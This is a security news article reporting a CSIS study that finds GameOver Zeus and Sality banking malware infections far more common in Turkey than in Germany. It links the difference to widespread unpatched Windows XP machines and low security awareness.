Windows XP-Heavy Turkey Overrun with GameOver Zeus Infections

GameOver Zeus and Sality banking malware infections are rampant in emerging countries such as Turkey where older, unpatched computers are prevalent, and security awareness is low.

Like a predator, criminals who profit online will seek out weak prey.

In the context of cybercrime, emerging countries such as Brazil, South Korea and Turkey among many others are in the crosshairs because of a number of factors, including a prevalence of outdated and unpatched computers and lower levels of security awareness within the general population.

Turkey is one country feeling the wrath more than most in Europe. A study published by CSIS of Denmark shows that country is overrun with banking malware infections, in particular GameOver Zeus and Sality.

For a country with half the number of Internet users that Germany has, for example, more than 91,000 GameOver Zeus infections and more than 65,000 Sality infections were reported in the first quarter of the year. That’s a ratio of 2.85 and 1.85 Zeus and Sality infections respectively per 1,000 Internet users. By contrast, Germany has 0.05 Sality infections per 1,000 users and 1.62 GameOver Zeus infections per 1,000 users.

“From a criminal’s perspective, given two valuable targets (e.g., two banks), it makes business sense to go after the weaker of the two targets. This approach is rewarded with the same or even a higher return as it is likely to successfully compromise more victims of the weaker target,” wrote Stephan Frei, PhD, in a recent CSIS report. “Thus, emerging countries such as Turkey will continue to be specifically targeted as long as their security is not on par with that of comparable countries.”

The most damning number with regard to Turkey’s overall security posture is that it has more than twice the market share of Windows XP computers compared to Germany, for example, Frei wrote. Turkey’s less secure standing compared to similar targets, he said, makes it easier pickings.

Zeus, and to a lesser extent Sality, are veteran pieces of financial malware. Together they account for millions in losses to fraud from personal and commercial banking accounts. They spread in a variety of fashions—exploit kits, spear phishing campaigns, drive-by downloads—all with the purpose of stealing credentials and other sensitive information leading to bank fraud and identity theft.

With Turkey’s high percentage of Windows XP computers in circulation (23.4 percent) compared to the average for the rest of Europe (16.4 percent), more machines are vulnerable to advanced and commodity attacks. XP, for example, lacks many of the memory exploit mitigations present in later versions of the Windows operating system.

Large Zeus botnets, many of which now spread via peer-to-peer infrastructures or domain generation algorithms rather than through a centralized command infrastructure, are resistant to takedown efforts and those that are stymied, quickly resurface.

CSIS said it collected and analyzed more than 4,000 botnet configuration files in the last 12 months, and learned much about the domain blacklists it uses to evade antivirus and intrusion detection signatures, as well as the webinjects the malware families use to hijack browser sessions and steal credentials. Most of the top antivirus vendors and technology leaders are among the top 20 on most domain blacklists, CSIS discovered. As for the webinjects, most modify specific banking log-in pages; more than 2,000 webinjects were recovered for every conceivable bank, social media platform, airline, ecommerce site and more. More than 4.3 webinjects per day were included in these campaigns, CSIS said.

Enterprises, such as financial institutions, as a result must do business with a large number of potentially compromised computers and that requires a healthy mix of risk assessment, fraud detection and intrusion detection capabilities.

“A thorough understanding and monitoring of cyber criminals’ capabilities is essential to prepare against and defeat modern attacks,” Frei said. “Without viable threat intelligence on cybercrime operations, organizations focus on defending against known threats and will be taken by surprise of any kind of new security challenge, or breaches, which learned to happen frequently.”

Suggested articles